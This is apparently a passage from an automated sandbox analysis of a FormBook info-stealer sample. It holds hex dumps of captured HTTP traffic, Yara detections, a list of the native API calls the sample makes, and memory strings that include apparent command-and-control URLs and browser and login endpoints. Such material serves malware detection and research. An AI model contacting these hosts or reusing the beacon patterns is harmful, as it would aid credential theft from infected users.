63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:02:57 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:02:59 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:03:02 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:03:05 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound">
            Source: NETSTAT.EXE, 0000000B.00000002.2583392591.00000000045F8000.00000004.10000000.00040000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000E.00000002.2581565135.0000000002C88000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://newdaydawning.net/igaf/?wZBh=UzoT8ph&8T2hn=z7pb/AVrgdjheaZEOJkK38wzdFwtWkfwIJb37ItQC6dYo/jeth
            Source: NU1aAbSmCr.exe, 00000000.00000002.1350243310.0000000002A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: mCFHCvdrqdDiDT.exe, 0000000E.00000002.2583578419.0000000004A1D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tophm.xyz
            Source: mCFHCvdrqdDiDT.exe, 0000000E.00000002.2583578419.0000000004A1D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tophm.xyz/30rz/
            Source: NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: NETSTAT.EXE, 0000000B.00000002.2579150975.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: NETSTAT.EXE, 0000000B.00000002.2579150975.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: NETSTAT.EXE, 0000000B.00000003.2000233405.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: NETSTAT.EXE, 0000000B.00000002.2579150975.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: NETSTAT.EXE, 0000000B.00000002.2579150975.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: NETSTAT.EXE, 0000000B.00000002.2579150975.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: NETSTAT.EXE, 0000000B.00000002.2579150975.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.NU1aAbSmCr.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.NU1aAbSmCr.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.1824100351.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2583578419.00000000049B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2580801626.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2581282687.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1822625318.0000000001950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 4.2.NU1aAbSmCr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 4.2.NU1aAbSmCr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1824100351.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.2583578419.00000000049B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.2580801626.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.2581282687.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1822625318.0000000001950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0042C9B3 NtClose,4_2_0042C9B3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622B60 NtClose,LdrInitializeThunk,4_2_01622B60
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01622DF0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01622C70
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016235C0 NtCreateMutant,LdrInitializeThunk,4_2_016235C0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01624340 NtSetContextThread,4_2_01624340
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01624650 NtSuspendThread,4_2_01624650
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622BE0 NtQueryValueKey,4_2_01622BE0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622BF0 NtAllocateVirtualMemory,4_2_01622BF0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622BA0 NtEnumerateValueKey,4_2_01622BA0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622B80 NtQueryInformationFile,4_2_01622B80
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622AF0 NtWriteFile,4_2_01622AF0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622AD0 NtReadFile,4_2_01622AD0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622AB0 NtWaitForSingleObject,4_2_01622AB0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622D30 NtUnmapViewOfSection,4_2_01622D30
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622D00 NtSetInformationFile,4_2_01622D00
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622D10 NtMapViewOfSection,4_2_01622D10
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622DD0 NtDelayExecution,4_2_01622DD0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622DB0 NtEnumerateKey,4_2_01622DB0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622C60 NtCreateKey,4_2_01622C60
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622C00 NtQueryInformationProcess,4_2_01622C00
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622CF0 NtOpenProcess,4_2_01622CF0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622CC0 NtQueryVirtualMemory,4_2_01622CC0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622CA0 NtQueryInformationToken,4_2_01622CA0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622F60 NtCreateProcessEx,4_2_01622F60
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622F30 NtCreateSection,4_2_01622F30
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622FE0 NtCreateFile,4_2_01622FE0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622FA0 NtQuerySection,4_2_01622FA0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622FB0 NtResumeThread,4_2_01622FB0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622F90 NtProtectVirtualMemory,4_2_01622F90
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622E30 NtWriteVirtualMemory,4_2_01622E30
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622EE0 NtQueueApcThread,4_2_01622EE0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622EA0 NtAdjustPrivilegesToken,4_2_01622EA0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622E80 NtReadVirtualMemory,4_2_01622E80
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01623010 NtOpenDirectoryObject,4_2_01623010
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01623090 NtSetValueKey,4_2_01623090
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016239B0 NtGetContextThread,4_2_016239B0
